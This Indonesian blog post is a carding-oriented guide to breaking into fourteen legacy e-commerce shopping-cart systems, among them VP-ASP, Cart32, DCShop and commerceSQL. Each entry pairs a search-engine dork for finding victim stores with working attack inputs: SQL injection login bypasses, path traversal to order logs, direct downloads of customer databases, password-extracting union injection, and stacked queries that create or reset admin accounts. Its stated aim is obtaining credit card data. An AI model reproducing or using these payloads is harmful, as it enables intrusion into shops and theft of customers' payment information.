Lompat ke konten Lompat ke sidebar Lompat ke footer

Bugs yang Bisa ditemukan di Web e-Commerce

Bugs yang Bisa ditemukan di Web e-Commerce

cms e-Commerce

Web Berbasis e-Commerce merupakan sasaran utama para Carder, Biasanya digunakan oleh para 'Carder' ( sebutan bagi mereka yang menyukai 'Carding' ) untuk mencari Akun CC atau PP., yang digunakan untuk bertransaksi seperti pembelian samrtphone. dan biasanya targetnya adalah PrestaShop, OsCommerce, Opencart, Drupal dan kawan2xnya.

Beberapa Bug yang bisa ditemukan


1. Bugs pada bentuk toko sistem shopadmin :
Toko akan muncul di search engine bila mengetikan keyword tertentu, seperti : allinurl:/shopadmin.asp, inurl:/shopadmin.asp
Contoh target :www.site.co.li/shopadmin.asp
Kelemahan sistem ini bila hacker memasukan kode injection seperti : user : 'or'1 pass : 'or'1

2. Bugs pada bentuk toko sistem : Index CGI
Toko akan muncul di search engine bila mengetikan keyword tertentu, seperti :
allinurl:/store/index.cgi/page=
Contoh target :
www.site.co.li/cgi-bin/store/index.cgi?page=short_blue.html
Hapus short_blue.html
dan ganti dengan -->../admin/files/order.log
Hasilnya:
www.site.co.li/cgi-bin/store/index.cgi?page=../admin/files/order.log

3. Bugs pada bentuk toko sistem : Lobby.asp
Toko akan muncul di search engine bila mengetikan keyword tertentu, seperti :
allinurl: Lobby.asp
Contoh :
www.site.co.li/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan --> fpdb/shop.mdb
Hasilnya :
www.site.co.li/fpdb/shop.mdb

4. contoh bugs pada bentuk toko sistem: DCShop
Toko akan muncul di search engine bila mengetikan keyword tertentu, seperti :
allinurl:/DCShop/
Contoh :
www.site.co.li/path/DCShop/path
Hapus /DCShop/path dan ganti dengan --> /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya :
www.site.co.li/path/DCShop/orders/orders.txt


5. Bugs pada bentuk toko sistem : PDshopro
Toko akan muncul di search engine bila mengetikan keyword tertentu, seperti :
allinurl:/shop/category.asp/catid=
Contoh :
www.site.co.li/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan --> /admin/dbsetup.asp
Hasilnya :
www.site.co.li/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb Download file sdatapdshoppro.mdb dengan merubah url nya menjadi ww/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca databaseaccess.mdb sebaiknya pake ms access aja)

6. Bugs pada bentuk: commerceSQL
Toko akan muncul di search engine bila mengetikan keyword tertentu, seperti :
 allinurl:/commercesql/
Contoh :
www.site.co.li/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan --> cgi-bin/commercesql/index.cgi?page=
Hasilnya :
www.site.co.li/cgi-bin/commercesql/index.cgi?page=

Untuk melihat admin config --> www.site.co.li/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl

Untuk melihat admin manager -->
www.site.co.li/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi

Untuk melihat file log/CCnya --> www.site.co.li/cgi-bin/commercesql/index.cgi?page=../admin/files/order...

7. contoh bugs pada bentuk toko sistem : EShop
Toko akan muncul di search engine bila mengetikan keyword tertentu, seperti :
--> allinurl:/eshop/

Contoh :www.site.co.li/xxxxx/eshop
Hapus /eshop dan ganti dengan --> /cg-bin/eshop/database/order.mdb
Hasilnya :www.site.co.li/.../cg-bin/eshop/database/order.mdb Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms acces saja)

8. Bugs pada bentuk toko sistem : Cart32 v3.5a
Toko akan muncul di search engine bila mengetikan keyword tertentu, seperti :
allinurl:/cart32.exe/
Contoh :www.site.co.li/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan --> error Bila kita mendapati page error dg keteranganinstalasi dibawahnya, berarti kita sukses! Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data ccCopy salah satu file .c32 yg ada atau semuanya ke notepad atau programtext editor lainnya.
Ganti string url tsb. menjadi seperti ini :
http://www.site.co.li/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.site.co.li/cart32/
Contoh
http://www.site.co.li/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32


9. Bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
Toko akan muncul di search engine bila mengetikan keyword tertentu, seperti :
allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
http://www.site.co.li/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%...,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--

Gantilah nilai dari string url terakhir dg:
%20'a%25'--
%20'b%25'--
%20'c%25'--

Kalau berhasil, kita akan mendapatkan informasi username dan password admin Untuk login admin ke
http://www.site.co.li/vpasp/shopadmin.asp
silahkan Cari sendiri datanya

10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
Toko akan muncul di search engine bila mengetikan keyword tertentu, seperti :
allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' wherefldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' wherefldusername=''--&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah anda.

Untuk mengganti password admin, masukkan keyword berikut :

Keyword=&category=5); update tbluser set fldpassword='' wherefldusername='admin'--&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di
http://www.site.co.li/vpasp/shopadmin.asp

11. Bugs pada bentuk toko sistem : metacart
Toko akan muncul di search engine bila mengetikan keyword tertentu, seperti :
allinurl:/metacart/
Contoh target :
www.site.co.li/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan --> /database/metacart.mdb
Hasilnya :  /
www.site.co.li/metacart/database/metacart.mdb

12. Bugs pada bentuk toko sistem : Shopper.cgi
Toko akan muncul di search engine bila mengetikan keyword tertentu, seperti :
allinurl: /cgi-local/shopper.cgi
Contoh :
www.site.co.li/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan -->  ...&template=order.log
Hasilnya :
www.site.co.li/cgi-local/shopper.cgi?preadd=action&key=...&template...

13. Bugs pada bentuk toko sistem:Proddetail.asp
Toko akan muncul di search engine bila mengetikan keyword tertentu, seperti :
allinurl:proddetail.asp?prod=
Contoh :
www.site.co.li/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan --> fpdb/vsproducts.mdb
Hasilnya :
www.site.co.li/fpdb/vsproducts.mdb

14. Bugs pada bentuk toko sistem:Digishop
Toko akan muncul di search engine bila mengetikan keyword tertentu, seperti :
inurl:"/cart.php?m="
Contoh :
http://www.site.co.li/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan -->admin
Hasilnya
http://www.site.co.li/store/admin
masukin username dan pass nya pake statment SQL injection Usename : 'or"=" Password :  'or"="

memang mayoritas website sasarannya rentan akan serangan sqli, jadi alangkah baiknya jika anda memiliki web e commerce pikirkanlah matang matang cms yang anda pilih.. karena beda cms maka beda pula bugnya...

Source: il7team.blogspot.co.id
Selalulah berfikir positif, karena pada kenyataannya semua dilalui tanpa rasa.!!
Agus Dwi
Agus Dwi Selalu ada cara lain untuk menjadi lebih baik dari hari ini.

Posting Komentar untuk "Bugs yang Bisa ditemukan di Web e-Commerce"